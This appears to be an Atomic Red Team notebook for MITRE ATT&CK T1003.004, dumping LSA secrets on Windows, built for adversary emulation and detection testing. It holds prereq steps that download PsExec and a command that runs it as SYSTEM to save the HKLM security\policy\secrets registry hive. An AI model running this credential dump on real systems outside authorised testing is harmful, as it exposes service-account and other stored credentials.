{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# T1003.004 - OS Credential Dumping: LSA Secrets",
    "\n",
    "Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)\n\n[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Atomic Tests"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #1 - Dumping LSA Secrets\nDump secrets key from Windows registry\nWhen successful, the dumped file will be written to $env:Temp\\secrets.\nAttackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.\nhttps://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Dependencies:  Run with `powershell`!\n##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1003.004\\bin\\PsExec.exe) {exit 0} else {exit 1}\n```\n##### Get Prereq Commands:\n```powershell\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"$env:TEMP\\PSTools.zip\"\nExpand-Archive $env:TEMP\\PSTools.zip $env:TEMP\\PSTools -Force\nNew-Item -ItemType Directory (Split-Path PathToAtomicsFolder\\T1003.004\\bin\\PsExec.exe) -Force | Out-Null\nCopy-Item $env:TEMP\\PSTools\\PsExec.exe PathToAtomicsFolder\\T1003.004\\bin\\PsExec.exe -Force\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1003.004 -TestNumbers 1 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nPathToAtomicsFolder\\T1003.004\\bin\\PsExec.exe -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1003.004 -TestNumbers 1"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Detection",
    "\n",
    "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis."
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": ".NET (PowerShell)",
   "language": "PowerShell",
   "name": ".net-powershell"
  },
  "language_info": {
   "file_extension": ".ps1",
   "mimetype": "text/x-powershell",
   "name": "PowerShell",
   "pygments_lexer": "powershell",
   "version": "7.0"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}